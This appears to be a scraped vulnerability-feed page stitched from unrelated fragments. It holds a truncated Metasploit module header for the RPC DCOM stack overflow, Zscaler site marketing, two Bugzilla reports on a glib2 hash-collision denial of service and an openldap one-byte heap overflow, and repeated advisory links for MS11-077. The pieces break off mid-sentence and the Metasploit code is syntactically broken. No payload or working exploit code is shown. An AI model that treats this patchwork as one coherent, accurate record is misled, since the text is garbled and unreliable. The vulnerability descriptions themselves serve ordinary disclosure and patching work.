# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft RPC DCOM Interface Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windo
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 11-11-2011
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Bugzilla
CVE-2012-0039 glib2: hash table collisions CPU usage DoS
bugzilla·2012-01-09·CVSS 7.5
CVE-2012-0039 [HIGH] CVE-2012-0039 glib2: hash table collisions CPU usage DoS
CVE-2012-0039 glib2: hash table collisions CPU usage DoS
It was reported [1] (and the original report [2]) that glib2 also suffers from algorithmic complexity attacks as described in oCERT-2011-003. While this was originally reported to upstream in 2003, it does not look as though anything was done to correct the problem. According to the Debian report, current glib2 is still vulnerable.
Doing a lookup on other g_str_hash() functions, the following packages may also be vulnerable if they copied code from glib2:
arts-1.5.10/flow/gsl/gslglib.c:172: guint g_str_hash (gconstpointer key)
gettext-0.17/gettext-tools/gnulib-lib/glib/gstring.c:97: g_str_hash (gconstpointer v)
pkg-config-0.23/glib-1.2.10/gstring.c:72: g_str_hash (gconstpointer key)
In addition to the above, the following are als
Bugzilla
CVE-2011-4079 openldap: one-byte buffer overflow in slapd
bugzilla·2011-10-26·CVSS 4.0
CVE-2011-4079 [MEDIUM] CVE-2011-4079 openldap: one-byte buffer overflow in slapd
CVE-2011-4079 openldap: one-byte buffer overflow in slapd
A bug in slapd's UTF8StringNormalize() function can cause a one-byte buffer overflow when it is passed a zero-length string. The code then writes a '\0' past the one-byte long buffer allocated on the heap, which could possibly allow a remote authenticated user to crash slapd. As per the upstream report [1], this bug has been present since 2003-04-07 [2] so should affect all versions of openldap we currently ship.
A patch to correct the flaw has been committed [3] (depends on the previous patch [4]).
[1] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=7059;selectid=7059
[2] http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commitdiff;h=67d6b23d
[3] http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commitdi
http://securityreason.com/securityalert/8473http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13103http://securityreason.com/securityalert/8473http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13103
2011-10-12
Published